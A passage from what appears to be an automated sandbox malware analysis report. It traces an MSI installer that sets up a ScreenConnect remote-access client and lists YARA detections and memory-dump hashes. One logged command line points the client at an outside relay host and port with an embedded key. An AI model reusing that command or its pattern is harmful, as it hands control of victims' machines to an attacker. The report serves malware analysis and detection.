                                                              Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding F119A6F073F792F7D0ECEED6C10FA13E C
                                                              Imagebase:0x3d0000
                                                              File size:59'904 bytes
                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:3
                                                              Start time:15:32:05
                                                              Start date:13/11/2024
                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:rundll32.exe "C:\Users\user\AppData\Local\Temp\MSID3F.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6032843 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                              Imagebase:0xa90000
                                                              File size:61'440 bytes
                                                              MD5 hash:889B99C52A60DD49227C5E485A016679
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:4
                                                              Start time:15:32:08
                                                              Start date:13/11/2024
                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 5DD10B1CF791748F5CDE2E7F0943941D
                                                              Imagebase:0x3d0000
                                                              File size:59'904 bytes
                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:5
                                                              Start time:15:32:08
                                                              Start date:13/11/2024
                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding B2E11333BB1052CECFB49C593AC661A5 E Global\MSI0000
                                                              Imagebase:0x3d0000
                                                              File size:59'904 bytes
                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:6
                                                              Start time:15:32:08
                                                              Start date:13/11/2024
                                                              Path:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=c74b013c-c400-4ba6-a343-b7faf5e5e46a&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=DXBLeave&c=&c=&c=&c=&c=&c=&c="
                                                              Imagebase:0x580000
                                                              File size:95'520 bytes
                                                              MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation: moderate
Has exited: false

Target ID: 7
Start time: 15:32:09
Start date: 13/11/2024
Path: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "c21e480d-13f5-4799-892b-1b4075726758" "User"
Imagebase: 0x280000
File size: 601'376 bytes
MD5 hash: 20AB8141D958A58AADE5E78671A719BF
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000007.00000000.1702671144.0000000000282000.00000002.00000001.01000000.00000010.sdmp, Author: Joe Security
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000007.00000002.2905272548.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe, Author: Joe Security
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation: moderate
Has exited: false

Target ID: 8
Start time: 15:32:11
Start date: 13/11/2024
Path: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "8bc7d613-b74f-4d66-a18a-de9574d5dc1b" "System"
Imagebase: 0xb20000
File size: 601'376 bytes
MD5 hash: 20AB8141D958A58AADE5E78671A719BF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000008.00000002.1743451963.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: moderate
Has exited: true

                                                                • Instruction ID: e4de9634317f4d545dcfc42028ec7445934bbc07b1ee9d169b811a5456f7f402
                                                                • Opcode Fuzzy Hash: a66710a148f628fb1cd501ad64077b13808f7b25015b186e78b1d845fc7947de
                                                                • Instruction Fuzzy Hash: 65216D75E50208DFCB54DF69D8849DEBBB6FF8C714B10816AE905EB320DB30A842CB90
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c00ad20ae33cf20e805d1a5ee26f161bbf104db48f11dba81d44998bbee8f642
                                                                • Instruction ID: c7bd227e43adf4ab4484b51898969c8f301778ef26343a6e12b4a4568099fe5a
                                                                • Opcode Fuzzy Hash: c00ad20ae33cf20e805d1a5ee26f161bbf104db48f11dba81d44998bbee8f642
                                                                • Instruction Fuzzy Hash: F6218334B401059FDB18DF64E860AA9BFB3EF8C315F145029D909A73A0CE7A6C45CB90
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3afb9f549a7a0af1a7c470994abcb3739a450fc0d913699c9a9cea08a876311b
                                                                • Instruction ID: 3b0d4edc9b5ba5e300af35d1d43f7e561ac61475955d9f32c7616de506939023
                                                                • Opcode Fuzzy Hash: 3afb9f549a7a0af1a7c470994abcb3739a450fc0d913699c9a9cea08a876311b
                                                                • Instruction Fuzzy Hash: 25110A307853940BEB2517386C243BA6BAACB46208F0054EAD642FB7A7DD64EC010392
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 01cc34d1e8c39ddebc04452b1b1ce3e0d81ca0293790334f8a5ce64dc4573265
                                                                • Instruction ID: 1ddf8ebd2824021d076ec10b8f83171448f71b05280dbee38298ec882929aa05
                                                                • Opcode Fuzzy Hash: 01cc34d1e8c39ddebc04452b1b1ce3e0d81ca0293790334f8a5ce64dc4573265
                                                                • Instruction Fuzzy Hash: 31216D35B80105AFDB18DF64E4A1AADBBB3EF8C314F144019D509A73A0CF39AD46CB90
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0c87ea8a64ed26213fd4b4b188194e85fa48e6d73409060028fe873acfd7240f
                                                                • Instruction ID: 25bfd1562b9f65a0663600bf09435baade6e62dc39d1163dfa215a9d0d1f3d20
                                                                • Opcode Fuzzy Hash: 0c87ea8a64ed26213fd4b4b188194e85fa48e6d73409060028fe873acfd7240f
                                                                • Instruction Fuzzy Hash: D4115134B40105AFDB14DF65D860AAEBBB7EF8C314F149029E809A73A0DF79AC45CB90
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8efaea535fb2b2b26c525b54aad34fa1d0ea2eb2393c6fc32f49ef76027bf2ca
                                                                • Instruction ID: 9579e39c1e2e548608ca82454bc30f8e47eadd4b46797dc6379e23391437b96d
                                                                • Opcode Fuzzy Hash: 8efaea535fb2b2b26c525b54aad34fa1d0ea2eb2393c6fc32f49ef76027bf2ca
                                                                • Instruction Fuzzy Hash: 04110A34B41104AFDB14EB64E461AADBBB6EF8C315F145029D509A73A0DF7AAC45CB90
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d27677ae05961688c3aa887a4dcffea1c4e196488702ce5a43473256e6df068d
                                                                • Instruction ID: 63b8a4b798e3d5a6e710c28f9ccd2baa15b2243d565819aad2955e5007adbe81
                                                                • Opcode Fuzzy Hash: d27677ae05961688c3aa887a4dcffea1c4e196488702ce5a43473256e6df068d
                                                                • Instruction Fuzzy Hash: DE2127B1D042498FDB10DFAAC8856EEFBB0FF48324F108029D559A7210C775A945CFA5
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5d9ca549b49197bae7ccd8e01c82dd148d3db3c8028166a5679865def75c85f4
                                                                • Instruction ID: 56f29fde954490e0d7a16721625d1f0976ed03fe829743886cf89e55fc12066a
                                                                • Opcode Fuzzy Hash: 5d9ca549b49197bae7ccd8e01c82dd148d3db3c8028166a5679865def75c85f4
                                                                • Instruction Fuzzy Hash: 7F118134A41105EFC704DFA4E4796A9BBB6EF8C311F144029E809E7350DF795C46CB91
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 698dc6f179ceac3e27ed909386ae2ad99159ad1bb4144d1b6ed2f5de9ebe4b27
                                                                • Instruction ID: 7c7c20453942cfd0c19392d7d3712a1c5684d7ef6dd30914cc8bdc9d08b088a2
                                                                • Opcode Fuzzy Hash: 698dc6f179ceac3e27ed909386ae2ad99159ad1bb4144d1b6ed2f5de9ebe4b27
                                                                • Instruction Fuzzy Hash: 0D01A536F001188BDF148BA8DC102EEB7F6EB8C315F0490BAC605B7264DB35A945C7A5
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 91350c4a03d0c27d9f2fda766928c8abd97b1131aa8b9b86020fbedf9f6537ee
                                                                • Instruction ID: c42fe7cde69368d7e61f510308bdccdfbc1599fa11843935fc1599ae60f71d2c
                                                                • Opcode Fuzzy Hash: 91350c4a03d0c27d9f2fda766928c8abd97b1131aa8b9b86020fbedf9f6537ee
                                                                • Instruction Fuzzy Hash: 8F018F3A3001109F8708DA6EF49586EB7EBFBD8264314803BF649C7311CE32EC0287A4
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6c7279c7ea5112a3cf7baba40d92f1334e75c01aefbe97fbc0783f4604f6a0dc
                                                                • Instruction ID: dd8b0a5ecbaba2107b2f3d804c2dd1711b719843291bedd3e5e489e72d715f37
                                                                • Opcode Fuzzy Hash: 6c7279c7ea5112a3cf7baba40d92f1334e75c01aefbe97fbc0783f4604f6a0dc
                                                                • Instruction Fuzzy Hash: 9A1136B1D042498FDB10DFAAC480AEEFBF4FF48324F108029D55967210CB746945CFA5
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8b087a8af29186e3490d49625922ba839278246686713320bc483973242b9c76
                                                                • Instruction ID: 0469024ed88d429b2f1da08d4559b50a44fb24f8e761b148047cf36c721cdf2d
                                                                • Opcode Fuzzy Hash: 8b087a8af29186e3490d49625922ba839278246686713320bc483973242b9c76
                                                                • Instruction Fuzzy Hash: 53019275F001588BDF188B64DD102EDBBB2AB88315F0490B9C205B7664DF359885CBA2
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d3938efc4473c1ecc457e1c03322412329a4cfb3603f19e5ae26cdabc9045840
                                                                • Instruction ID: 7467f6ff29f1c22fb51956f4b41f0ab26a09c7ed215b02d1a4f5356034617ad5
                                                                • Opcode Fuzzy Hash: d3938efc4473c1ecc457e1c03322412329a4cfb3603f19e5ae26cdabc9045840
                                                                • Instruction Fuzzy Hash: D1110D35601115EFCB54DF64E878AA9BBB6EF8C311F14401AE50AA7390CF795C45CB91
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: aa623ff0b9235548ce6b17252bf43657b480c3690163fa985b521eb7814d5bdc
                                                                • Instruction ID: 74fb7d232015f0cf02650e96b1d91cfc95e494eeae5b12f0b528b2542222ea61
                                                                • Opcode Fuzzy Hash: aa623ff0b9235548ce6b17252bf43657b480c3690163fa985b521eb7814d5bdc
                                                                • Instruction Fuzzy Hash: B301F730B4A3095FCB199F3479351267FEAEB8560430118EAC64ACF261FD19D80B83D2
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 351bf82a917c8657b0efb22f003829a325a3a5c35808515d47ab179b7870eb15
                                                                • Instruction ID: eac29a69551b851ad9da7cf1094d22ed7551cb7fcb288edbb3b211292e17c3c3
                                                                • Opcode Fuzzy Hash: 351bf82a917c8657b0efb22f003829a325a3a5c35808515d47ab179b7870eb15
                                                                • Instruction Fuzzy Hash: 3B014E716897944FE70237B478107AB7F964F0331DF1550EBDA889E0B3DD599845C3A1
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 947793691a22d46d1746aa71fb86c6a2bb444c553155b6031dffe28b599c3e86
                                                                • Instruction ID: 32a3bc52fb609b5d8512bb30a100605173e1f0b31deeeb821c25b284b7c5d791
                                                                • Opcode Fuzzy Hash: 947793691a22d46d1746aa71fb86c6a2bb444c553155b6031dffe28b599c3e86
                                                                • Instruction Fuzzy Hash: 3AF07872B852205BF71817B45C14FBDA752DBC171CF04E16AD2189F6F0DA26B4438380
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1672597093.00000000031DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 031DD000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_31dd000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 02c7d7214c494de736c28e8741b5f9555bd06e8d1e109fecf0b247a2b74073df
                                                                • Instruction ID: 6a278d0891103b2fbfc095c2199976cfe035d2008eb1a342a393a5fe53e82d23
                                                                • Opcode Fuzzy Hash: 02c7d7214c494de736c28e8741b5f9555bd06e8d1e109fecf0b247a2b74073df
                                                                • Instruction Fuzzy Hash: 4A01F7310083009BE710CE25FD84B67FF9CDF8A324F1CC56AED080A146C7799881C6B1
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e4e48edd87273a80c955cf5b22856e40ba207650c4fbaaf44a3eb389c36d783f
                                                                • Instruction ID: d9a57fdd96c08114a52b770e3b536b9d68d5ff862480edca5fee7c715c198ab0
                                                                • Opcode Fuzzy Hash: e4e48edd87273a80c955cf5b22856e40ba207650c4fbaaf44a3eb389c36d783f
                                                                • Instruction Fuzzy Hash: 2101B131B402098BDB18EB79C4A47AEBAE3AFC8344F24846ED005AB3A4CF755D55CBC1
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 058eee7e8f9971cd0f305405f67e49121cd4331a039ca4ab3eda36f51d19d752
                                                                • Instruction ID: 4cea812f50441d61faf8db196d7d22da1187ca680c6644b855f6b8cd0a802d3a
                                                                • Opcode Fuzzy Hash: 058eee7e8f9971cd0f305405f67e49121cd4331a039ca4ab3eda36f51d19d752
                                                                • Instruction Fuzzy Hash: 3E018F317402088BEB18AB7AC4647AF7AE69FC9354F20846ED406A73A0CF756D45CBD1
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1ffd0bf0bd538bf18252eb1ad1cf97b02cb14ec655d2198a9b905f817afb6641
                                                                • Instruction ID: 8cb0999b6553366d39387144dd0c0458575d53e0b7643ba8ff67ad26d9b33953
                                                                • Opcode Fuzzy Hash: 1ffd0bf0bd538bf18252eb1ad1cf97b02cb14ec655d2198a9b905f817afb6641
                                                                • Instruction Fuzzy Hash: 0501D131B5010987EB18AB6895A53EF77B79BCC308F108429C101F33A4CE756C0687D5
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1672597093.00000000031DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 031DD000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_31dd000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2fe9102cad765103efd08a9d6acbc431f7905ccd8fbc53b66f727f4f14bb0881
                                                                • Instruction ID: 425c7e15ca98da8434777e0a94aabdb620135b5c45eb65b581fa4d763d6ad19e
                                                                • Opcode Fuzzy Hash: 2fe9102cad765103efd08a9d6acbc431f7905ccd8fbc53b66f727f4f14bb0881
                                                                • Instruction Fuzzy Hash: 94015E6140E3C09FD7128B259C94B52BFB8EF57224F1DC5DBD9888F1A3C2699845C7B2
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ca420ffc8e805dc0363b7e5920e8fed0439773b20371df3e3a93e56872c77369
                                                                • Instruction ID: 8f398e01c3450de6b7e62dd1c99edc1d31823a3c8f22d125db561a9150e180da
                                                                • Opcode Fuzzy Hash: ca420ffc8e805dc0363b7e5920e8fed0439773b20371df3e3a93e56872c77369
                                                                • Instruction Fuzzy Hash: 61F046723003404FC3129B1EE891956BFE6EFC96283148426F569CB320DF71DC0587D0
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f122ef5698572f0babd3129cb5ab5bbe71499329816adbc1f155bc34e882efb6
                                                                • Instruction ID: d88085f3a586e0acc8c1216f6fd4e048b8790c2ca403a297bd4b43a725bfa255
                                                                • Opcode Fuzzy Hash: f122ef5698572f0babd3129cb5ab5bbe71499329816adbc1f155bc34e882efb6
                                                                • Instruction Fuzzy Hash: D4F0C03268E3905FD701273878343A6BF65CF06208F0564EBE749EB167DD685C048385
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9872bdfa0628094edcb7ba29713b3444934cf75105e3935dfc21ec42edc1e765
                                                                • Instruction ID: 3985d56589e6eae869f7530fab8175089cc200656847f5d5fe2b20381ccba20f
                                                                • Opcode Fuzzy Hash: 9872bdfa0628094edcb7ba29713b3444934cf75105e3935dfc21ec42edc1e765
                                                                • Instruction Fuzzy Hash: BAF027733483444BC312974EFC41993BFE6EBC52787194067E28CC3211CBB2A40487E0
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b3889cbb1bb06f4a7816547c60e6b187c9154be8ac90ea3d6733a6d5bff4f0ed
                                                                • Instruction ID: be26d8f66e84f218f9348fc8ce5afda142a98f89269672cd0d25925f1beae1e9
                                                                • Opcode Fuzzy Hash: b3889cbb1bb06f4a7816547c60e6b187c9154be8ac90ea3d6733a6d5bff4f0ed
                                                                • Instruction Fuzzy Hash: 23F0BB34B452065FDB1C9F7471752267B9AEBC5B54305186EC24ACF2B1ED29D80687C2
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d52e183016a5b303c6baa4328f64180936bc98eab14cf66157cce87887bfa8aa
                                                                • Instruction ID: 81f859bb3d6c1de9e6c10c7a436d2cd137acd203fa06abfb9eb2010234be2c8e
                                                                • Opcode Fuzzy Hash: d52e183016a5b303c6baa4328f64180936bc98eab14cf66157cce87887bfa8aa
                                                                • Instruction Fuzzy Hash: E3F082713402005B9715AA5FE89195BBBDAEBC8668310852AE959C7314DFB1EC0547E4
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0eeeb45b256f6356bcdd48da38b0bfb3eba5856fcfac4010092cac338ee042d7
                                                                • Instruction ID: 4e42a20672de4a64494af7fdf71bcacb52fbde7428198e4749d0d83ca5f8bdda
                                                                • Opcode Fuzzy Hash: 0eeeb45b256f6356bcdd48da38b0bfb3eba5856fcfac4010092cac338ee042d7
                                                                • Instruction Fuzzy Hash: 37F0EC377093406FC3019A2AE850AD7BFA6DFCA228F1500BAE14CD7256CE369C46C7A1
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a4470525034fb3765f51c6b53ada2b599376befad992deeac9890e1e2cdd8472
                                                                • Instruction ID: 3a0c62d261a695953decd1d275ed476e4c5db0294715e69f78a5713a4450ffae
                                                                • Opcode Fuzzy Hash: a4470525034fb3765f51c6b53ada2b599376befad992deeac9890e1e2cdd8472
                                                                • Instruction Fuzzy Hash: 95F0EC31A5479807FB391B348C003E66B988B4661CF0010E7D541F77B3E5D4FC4653A2
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7fc112b121b8ad370e130b8d5d9df788e92b57af0468cfeca5101c2ce2bfd0a8
                                                                • Instruction ID: 80fac01b5a4b9106a270e79f665a2b3bf05457ab7a7cd611862001dc5cfc21e7
                                                                • Opcode Fuzzy Hash: 7fc112b121b8ad370e130b8d5d9df788e92b57af0468cfeca5101c2ce2bfd0a8
                                                                • Instruction Fuzzy Hash: 75F0EC7574071043D7189E16A0E477D6287ABC8759B04903DE909C32F2DF34A840D254
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
